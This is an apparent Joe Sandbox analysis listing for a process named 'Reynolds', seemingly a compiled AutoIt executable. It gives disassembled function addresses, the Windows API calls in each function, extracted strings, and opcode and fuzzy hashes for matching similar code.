                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 4141327611-0
                                                                                                      • Opcode ID: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                                                                                                      • Instruction ID: d07873f1ba010b7a668d5d9fb2a26ebdb600651bfaa5caa058fdb1009790c42c
                                                                                                      • Opcode Fuzzy Hash: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                                                                                                      • Instruction Fuzzy Hash: 4041A461A0E642E6FB67AF10F040379E6B0EF80B90F969171DB5D067A5DE2CD44B8720
                                                                                                      Function 00007FF7AA19CDF8 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3340791633-0
                                                                                                      • Opcode ID: 8534e56cbfa9c923cdf90f1edd83f1c731ffea0719ea79c7905dbe4df23172ef
                                                                                                      • Instruction ID: 42a17ecd4e161042fa083ebea91a7e0035c55a9a45bb4f08f2a8d53dca89be48
                                                                                                      • Opcode Fuzzy Hash: 8534e56cbfa9c923cdf90f1edd83f1c731ffea0719ea79c7905dbe4df23172ef
                                                                                                      • Instruction Fuzzy Hash: E8419531E0A546EAFB66AB15E4446F8F772AB40B94F9A4072E65E436F1CE3CE543C310
                                                                                                      Function 00007FF7AA133C28 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AA12A02B,?,?,?,00007FF7AA129FE6), ref: 00007FF7AA133C41
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AA12A02B,?,?,?,00007FF7AA129FE6), ref: 00007FF7AA133CA3
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AA12A02B,?,?,?,00007FF7AA129FE6), ref: 00007FF7AA133CDD
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AA12A02B,?,?,?,00007FF7AA129FE6), ref: 00007FF7AA133D07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1557788787-0
                                                                                                      • Opcode ID: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                                                                                                      • Instruction ID: b1a1303e887023523a4ae3472be4a2aec74c7564eeae03238280e8899033e6ea
                                                                                                      • Opcode Fuzzy Hash: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                                                                                                      • Instruction Fuzzy Hash: 8F21B131E09791D1F665AF12F440029E6B4FB84BD0B8A5175DE8E23BA4DF3CE4529328
                                                                                                      Function 00007FF7AA1A180C Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF7AA0F2794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF7AA13A57D), ref: 00007FF7AA0F27B1
                                                                                                      • GetCursorPos.USER32 ref: 00007FF7AA1A1861
                                                                                                      • TrackPopupMenuEx.USER32 ref: 00007FF7AA1A1885
                                                                                                      • GetCursorPos.USER32(?,?,00000000,?,?,00007FF7AA13A35D,?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA1A18CC
                                                                                                      • DefDlgProcW.USER32(?,?,00000000,?,?,00007FF7AA13A35D,?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA1A1910
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2864067406-0
                                                                                                      • Opcode ID: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                                                                                                      • Instruction ID: b166ea1be3ba6e70445661a3aeede8e0067d52b8d8bf16ee67b6d77e84e87030
                                                                                                      • Opcode Fuzzy Hash: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                                                                                                      • Instruction Fuzzy Hash: C5316836A09A46D2EA21EB16F4943B9A370FB88F94F954172DA4D437B4DF3CD4868710
                                                                                                      Function 00007FF7AA0F1AA8 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 4127811313-0
                                                                                                      • Opcode ID: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                                                                                                      • Instruction ID: 1c5ab94427c315b398639867b55acce3bd176759d87a2393f26582dea64c69bb
                                                                                                      • Opcode Fuzzy Hash: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                                                                                                      • Instruction Fuzzy Hash: 97216B32A09647E6FA20AB05F49056EB370FB84B80F960572EB4D43B69DF3CE5528720
                                                                                                      Function 00007FF7AA0FDADC Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3970641297-0
                                                                                                      • Opcode ID: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                                                                                                      • Instruction ID: 93047cde1a53170f2aa82bcc330f2f177773dcfeb529e9b3afe9f1a57e0234d9
                                                                                                      • Opcode Fuzzy Hash: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                                                                                                      • Instruction Fuzzy Hash: 2A216972A097C1DAE7A49B25E4407AAB7A0FB88B84F840139DA8D43B64DB3CD490CB00
                                                                                                      Function 00007FF7AA122E48 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ctrlfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 697997973-0
                                                                                                      • Opcode ID: ceb11bdc7e533b6efe9193ca724860c089eef8b0199c88c154fa5b9cecae704e
                                                                                                      • Instruction ID: 2672f7ae12e12e787f8116c3a5055d8c6417e8f254ac45eaa05874dee1744e0b
                                                                                                      • Opcode Fuzzy Hash: ceb11bdc7e533b6efe9193ca724860c089eef8b0199c88c154fa5b9cecae704e
                                                                                                      • Instruction Fuzzy Hash: 7511D721908641D2F612AB28F04107FD371EF9A380FB54330F7890A6B9DF2DD4468B50
                                                                                                      Function 00007FF7AA1A01F8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 357397906-0
                                                                                                      • Opcode ID: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                                                                                                      • Instruction ID: 6df18dcfa29643d7d7c3274ba870e444e5b1d3ef7178c51d993d3df10569668f
                                                                                                      • Opcode Fuzzy Hash: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                                                                                                      • Instruction Fuzzy Hash: 972138B6A04741EFEB40DF78E84019C77B0F348B88B404866EE1893B2CDB78D655CB50
                                                                                                      Function 00007FF7AA12B608 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$abort
                                                                                                      • String ID:
                                                                                                      • API String ID: 1447195878-0
                                                                                                      • Opcode ID: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                      • Instruction ID: d2487b2a218307c052500fe40cfe8013d3e9cdb8c2e30b252f780d764b6d42b3
                                                                                                      • Opcode Fuzzy Hash: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                      • Instruction Fuzzy Hash: F0011320A0F746E2FA5BB761F5A51799171AF84790FDA44B8D91E027F6ED2CF80A4320
                                                                                                      Function 00007FF7AA1A0EAC Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                      • String ID:
                                                                                                      • API String ID: 1539411459-0
                                                                                                      • Opcode ID: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                                                                                                      • Instruction ID: 5fe203777453c8d338ceb57763b0b19fd173eafd2856ca28365c9ea8ae1c473e
                                                                                                      • Opcode Fuzzy Hash: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                                                                                                      • Instruction Fuzzy Hash: 0401C032A19291E2F351AB15F808739BA60AB85BA4F990174DE4A03BB1CF7DD4428B10
                                                                                                      Function 00007FF7AA12CB08 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: gfffffff
                                                                                                      • API String ID: 3215553584-1523873471
                                                                                                      • Opcode ID: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                      • Instruction ID: 2c08cacfd12fbedfc7a3dc50e10ec52f6b25d57f94845ce9d47eed79d7b60e29
                                                                                                      • Opcode Fuzzy Hash: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                      • Instruction Fuzzy Hash: 55915863A0A38AD6FB239F25E1403BCAB65AB55BD0F458171CB8D073A5DA3DE11BC311
                                                                                                      Function 00007FF7AA1622F8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • OleSetContainedObject.OLE32(?,?,?,?,?,?,?,?,?,00007FF7AA1627FF), ref: 00007FF7AA162538
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContainedObject
                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                      • API String ID: 3565006973-3941886329
                                                                                                      • Opcode ID: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                      • Instruction ID: 814f34f8fa5ca7364d3b78aec96a9ad561338900ffa61f96c8fdcc15c678214d
                                                                                                      • Opcode Fuzzy Hash: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                      • Instruction Fuzzy Hash: 6F911872605B42D2EB25DF29E4506ADB3B4FB88B94F928026CE8D83724DF3DD856C310
                                                                                                      Function 00007FF7AA12CF38 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: e+000$gfff
                                                                                                      • API String ID: 3215553584-3030954782
                                                                                                      • Opcode ID: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                                                                                                      • Instruction ID: 40e4e52020123ef3c95655364da0f0aeb70a49b957b345d6b8d9ccfc8976356c
                                                                                                      • Opcode Fuzzy Hash: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                                                                                                      • Instruction Fuzzy Hash: 11515C66B197C1D6F7269F35E8403A9AAA1E740B90F898271C79C4BBE5CE2DD04BC710
                                                                                                      Function 000002453CA21880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,000002453CA21247), ref: 000002453CA219F9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                      • API String ID: 544645111-395989641
                                                                                                      • Opcode ID: 086e72abe92c5460fcb36e8b5c9fa1987531d8d699f2152a99dadd56f0f8ef58
                                                                                                      • Instruction ID: d5693a448426e8fcf8bc6fcee3a499123a7fcb8eec9e888672be7727374a2987
                                                                                                      • Opcode Fuzzy Hash: 086e72abe92c5460fcb36e8b5c9fa1987531d8d699f2152a99dadd56f0f8ef58
                                                                                                      • Instruction Fuzzy Hash: 30516C33710E74C7EB129FA6E9487982FA1F714BD4F544191DAAA07B96C73AC9C6C700
                                                                                                      Function 00007FF7AA19A67C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                      • String ID: static
                                                                                                      • API String ID: 3467290483-2160076837
                                                                                                      • Opcode ID: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                                                                                                      • Instruction ID: 3a23de68b3bdb6f4272d94dfdd289479ed8c382c8b19d715ba211a15f94a0b88
                                                                                                      • Opcode Fuzzy Hash: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                                                                                                      • Instruction Fuzzy Hash: EA410A725096C2D6E671AF21F4407AEB7B1FB84790F514235EBE903A69EB3CD486CB10
                                                                                                      Function 00007FF7AA180DE4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
